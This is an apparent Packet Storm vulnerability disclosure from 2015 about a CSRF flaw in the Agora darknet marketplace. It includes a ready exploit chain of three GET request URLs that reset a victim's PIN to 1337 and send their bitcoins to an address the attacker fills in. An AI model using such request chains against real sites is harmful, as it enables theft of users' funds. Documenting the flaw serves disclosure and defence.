Agora Marketplace Cross Site Request Forgery

2015-02-18T00:00:00
ID PACKETSTORM:130435
Type packetstorm
Reporter The Guardians of Peace
Modified 2015-02-18T00:00:00

Description

                                        
                                            `Ladies and gentlemen  
Boys and girls  
It come to our attention that a brave warrior for the people Ross  
William Ulbricht was unlawfully convicted by the corporation known as  
the American government.   
  
This mockery of justice has not gone unnoticed.   
  
In order to protect the next generation of darknet markets we will be  
disclosing vulnerabilities for these sites in order to make these  
sites safer from attack.   
  
To start, the Agora Marketplace contains a CSRF vulnerability which  
can be used to drain a victim account of all of their Bitcoins. The  
following URLs can be used to perform this attack:  
  
URL to start PIN reset:  
http://agorahooawayyfoe.onion/startresetpin?action=askresetpinaction&controller=user&confirmed=true&confirm-submit=  
  
URL to change current PIN:  
http://agorahooawayyfoe.onion/resetpin?pin1=1337&pin2=1337&submit=Save  
  
URL to send bitcoins using the new pin:  
http://agorahooawayyfoe.onion/sendbitcoins?targetaddress=[YOUR_BTC_ADDY]&withdrawschedule=0&targetamount=1&walletpin=1337&submit=Send  
  
These are all GET requests and don't require JavaScript to work.  
NoScript cannot save you from poor coding practices.  
  
There will be more to come. Stay safe. Stay anonymous.  
  
-The Guardians of Peace  
  
  
`